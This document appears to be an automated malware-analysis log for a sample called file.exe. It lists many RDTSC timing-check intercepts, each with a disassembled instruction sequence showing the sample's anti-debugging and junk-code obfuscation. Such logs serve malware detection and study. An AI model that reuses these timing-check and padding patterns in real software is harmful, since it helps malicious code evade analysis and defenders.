Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF52B8 second address: BF52BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF52BC second address: BF52C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF32CE second address: BF32DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF42C5 second address: BF42D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F568CBD42B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF740A second address: BF740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF740E second address: BF748E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F568CBD42B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jne 00007F568CBD42C6h 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+122D2599h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F568CBD42B8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F568CBD42B8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov di, DF61h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push ebx 0x0000005c jng 00007F568CBD42B6h 0x00000062 pop ebx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8446 second address: BF844A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF945E second address: BF9463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9463 second address: BF94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F568CECBB28h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F568CECBB34h 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122D2B15h] 0x00000031 push 00000000h 0x00000033 add dword ptr [ebp+122D210Ch], ecx 0x00000039 mov bx, si 0x0000003c xchg eax, esi 0x0000003d push ecx 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 pop edx 0x00000042 pop ecx 0x00000043 push eax 0x00000044 je 00007F568CECBB34h 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF94C8 second address: BF94CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA433 second address: BFA437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA437 second address: BFA44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F568CBD42BBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA44B second address: BFA455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F568CECBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA455 second address: BFA4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx edi, si 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F568CBD42B8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 add bl, 00000043h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F568CBD42B8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D312Fh] 0x0000004d xchg eax, esi 0x0000004e jl 00007F568CBD42BEh 0x00000054 push esi 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA4B8 second address: BFA4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA4C3 second address: BFA4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF65ED second address: BF65F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF65F1 second address: BF65F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB60A second address: BFB61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F568CECBB2Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA670 second address: BFA674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC5AC second address: BFC5B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB804 second address: BFB815 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F568CBD42B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD622 second address: BFD649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F568CECBB26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC70F second address: BFC72B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC72B second address: BFC72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC80A second address: BFC814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD773 second address: BFD785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F568CECBB28h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD785 second address: BFD78F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C051EA second address: C051EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C052FC second address: C05319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CBD42C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C055E8 second address: C055EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B57A second address: C0B584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B584 second address: C0B588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B588 second address: C0B593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B593 second address: C0B598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B598 second address: C0B59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0BE0E second address: C0BE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F568CECBB2Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13186 second address: C13190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C124DF second address: C124E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C124E3 second address: C124E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C124E7 second address: C1250B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F568CECBB38h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1266D second address: C1268E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F568CBD42B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1268E second address: C12692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12A7F second address: C12A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F568CBD42B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12BB3 second address: C12BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12BB7 second address: C12BCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F568CBD42B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F568CBD42BAh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13041 second address: C13045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A461 second address: C1A46D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F568CBD42B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A46D second address: C1A48A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F568CECBB26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A48A second address: C1A48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A613 second address: C1A624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A624 second address: C1A628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A628 second address: C1A631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A790 second address: C1A7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CBD42BEh 0x00000009 jnl 00007F568CBD42CAh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A7BF second address: C1A7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A8E7 second address: C1A8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A8ED second address: C1A928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CECBB36h 0x00000009 popad 0x0000000a jmp 00007F568CECBB31h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A928 second address: C1A931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AE6D second address: C1AE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AE77 second address: C1AE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B2A6 second address: C1B2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B804 second address: C1B80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B80A second address: C1B813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B813 second address: C1B81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A137 second address: C1A140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A140 second address: C1A15E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F568CBD42DDh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F568CBD42BDh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C20EAE second address: C20EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C20EB6 second address: C20EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1738 second address: BCA72A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F568CECBB2Ah 0x00000012 call dword ptr [ebp+122D2729h] 0x00000018 jng 00007F568CECBB40h 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007F568CECBB26h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D14 second address: BE1D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D19 second address: BE1D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F568CECBB2Ah 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007F568CECBB38h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D4D second address: BE1D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D53 second address: BE1D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D57 second address: BE1D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D5B second address: BE1D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F568CECBB2Fh 0x00000011 js 00007F568CECBB26h 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D80 second address: BE1D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D8F second address: BE1D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1D93 second address: BE1DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F568CBD42B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1E8B second address: BE1E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE1E91 second address: BE1E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2057 second address: BE205B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE267A second address: BE2680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE27B7 second address: BE27CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F568CECBB26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F568CECBB26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE27CE second address: BE27D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE27D2 second address: BE27D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE27D8 second address: BE27E2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F568CBD42BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2B49 second address: BCB2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F568CECBB2Ah 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D2F12h] 0x00000013 call dword ptr [ebp+124497F1h] 0x00000019 jng 00007F568CECBB44h 0x0000001f jmp 00007F568CECBB2Eh 0x00000024 pushad 0x00000025 jc 00007F568CECBB26h 0x0000002b push edx 0x0000002c pop edx 0x0000002d jo 00007F568CECBB26h 0x00000033 popad 0x00000034 pushad 0x00000035 jmp 00007F568CECBB39h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C204C0 second address: C204C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C20675 second address: C20684 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C20684 second address: C2068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C207DF second address: C207F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F568CECBB34h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C207F8 second address: C207FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C207FD second address: C2080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CECBB2Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29264 second address: C2926A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2926A second address: C2926E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
